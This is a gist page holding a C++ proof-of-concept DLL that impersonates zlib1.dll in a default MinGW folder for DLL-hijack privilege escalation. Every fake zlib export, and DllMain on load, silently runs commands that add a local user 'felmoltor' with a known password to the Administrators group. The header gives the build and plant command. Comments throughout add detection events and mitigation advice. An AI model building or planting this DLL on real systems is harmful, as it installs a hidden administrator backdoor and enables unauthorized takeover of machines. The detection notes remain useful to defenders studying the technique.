@felmoltor
Last active February 29, 2024 06:55
Privilege escalation with DLL Hijack of zlib1.dll on a MinGW default installation
// Author: Felipe Molina (@felmoltor)
//
// MinGW DLL Hijack Privilege Escalation POC.
// This DLL takes the place of the legitimate library "zlib1.dll", which resides
// in the default MinGW installation folder as "C:\MinGW\bin\zlib1.dll".
//
// g++ -c -DPRIVESC_DLL mingwprivesc.dll.cpp & g++ -shared -o mingwprivesc.dll mingwprivesc.dll.o -Wl,--out-implib,main.a & copy /y mingwprivesc.dll C:\MinGW\bin\zlib1.dll
#include <windows.h>
// Stand-in for zlib's compress() export: same name and C linkage, but it takes
// no arguments and compresses nothing. It only launches two hidden command
// lines and returns 0. The commands run with the privileges of whichever
// process loaded the DLL, so they only succeed when that process is elevated.
// Detection: process-creation telemetry (Security 4688 / Sysmon 1) showing
// cmd.exe and net.exe with "user ... /add" or "localgroup ... /add" under a
// process that loaded zlib1.dll, followed by Security events 4720 (account
// created) and 4732 (member added to a local group).
extern "C" __declspec(dllexport) int compress() {
// Creates a local account named "felmoltor" whose password equals the user
// name; stdout/stderr go to NUL. The second argument 0 is SW_HIDE (no window).
// The credential is public on this page: remove the account after any test.
WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
// Adds that account to the local group "Administradores", the Spanish-localised
// name of the built-in Administrators group. Alerting should key on the group
// SID S-1-5-32-544 rather than on the display name.
WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
// Neither WinExec result is checked; 0 is returned whatever happened.
return 0;
}
// Stand-in for zlib's compressBound() export. It takes no arguments and does
// no size computation; it runs the same two hidden commands as the other
// exported stubs in this file and returns 0.
// NOTE(review): a caller expecting a real buffer bound gets 0, so the host
// program is likely to malfunction. Unexpected failures in MinGW tools that
// link zlib1.dll are worth treating as a triage signal.
extern "C" __declspec(dllexport) int compressBound() {
// Creates local account "felmoltor" (password equal to the user name), output
// discarded, window hidden (second argument 0 is SW_HIDE).
WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
// Adds the account to the local group "Administradores" (Spanish-localised
// Administrators group name).
WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
// WinExec return values are ignored.
return 0;
}
// Stand-in for zlib's inflateEnd() export. No stream argument is accepted and
// nothing is released; the body only launches two hidden command lines.
// Each call to this export repeats the account-creation attempt, so one run of
// a host program can produce several identical cmd.exe/net.exe process trees.
extern "C" __declspec(dllexport) int inflateEnd() {
// Attempts to create local account "felmoltor" with the user name as password;
// output is redirected to NUL and the window is hidden (0 is SW_HIDE).
WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
// Attempts to add the account to the local group "Administradores".
WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
// Always 0, which is also zlib's Z_OK value; presumably so callers see success.
return 0;
}
// Stand-in for zlib's inflateInit_() export (the symbol behind the
// inflateInit macro). It accepts no arguments and initialises nothing; it only
// launches two hidden command lines and returns 0.
// Mitigation context: this file is only loaded if it can be written over
// C:\MinGW\bin\zlib1.dll, as the copy step in the header build command does.
// Auditing that folder's ACL for write access by non-administrators addresses
// the root cause.
extern "C" __declspec(dllexport) int inflateInit_() {
// Creates local account "felmoltor" (password equal to the user name); output
// discarded, no window shown (0 is SW_HIDE).
WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
// Adds the account to the local group "Administradores".
WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
// Result of both WinExec calls is ignored.
return 0;
}
// Stand-in for zlib's inflateReset() export. It takes no stream argument and
// resets nothing; the body is the same two hidden commands used by the other
// exported stubs in this file.
// The commands inherit the token of the loading process. The escalation
// therefore depends on an administrator or service running a program that
// loads zlib1.dll from C:\MinGW\bin.
extern "C" __declspec(dllexport) int inflateReset() {
// Account creation attempt: user "felmoltor", password "felmoltor", output to
// NUL, hidden window (second argument 0 is SW_HIDE).
WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
// Group membership attempt: local group "Administradores".
WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
// Unconditional 0; failures of the commands above are not reported.
return 0;
}
// Stand-in for zlib's inflate() export. It accepts no arguments and
// decompresses nothing, so a host program that needs real output will not
// get it. The body launches two hidden command lines and returns 0.
// Integrity check for responders: compare the hash and signature of
// C:\MinGW\bin\zlib1.dll with the copy shipped by the MinGW package. A
// replaced file that exports only a handful of zlib symbols is a strong indicator.
extern "C" __declspec(dllexport) int inflate() {
// Creates local account "felmoltor" with the user name as password; output is
// discarded and the window hidden (0 is SW_HIDE).
WinExec("cmd.exe /C net user felmoltor felmoltor /add >NUL 2>&1", 0);
// Adds the account to the local group "Administradores" (localised name;
// the group's well-known SID is S-1-5-32-544).
WinExec("cmd.exe /C net localgroup Administradores felmoltor /add >NUL 2>&1", 0);
// WinExec results are not inspected.
return 0;
}
// DLL entry point. fdwReason is never inspected, so compress() and its two
// commands run on every loader notification this DLL receives. The first run
// happens when a process loads the file, before any export is called.
// Defensive takeaway: loading alone triggers the payload, so an image-load
// event (Sysmon 7) for an unsigned or unexpected zlib1.dll under C:\MinGW\bin
// is the earliest point to alert. Removing write access to that folder for
// non-administrators prevents the replacement.
// NOTE(review): this runs while the loader lock is held; Microsoft's DLL
// guidance advises against starting processes from DllMain. Confirm before
// relying on this behaviour in a test harness.
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
// Return value of compress() (always 0) is ignored.
compress();
// TRUE reports a successful load, so the host process continues.
return TRUE;
}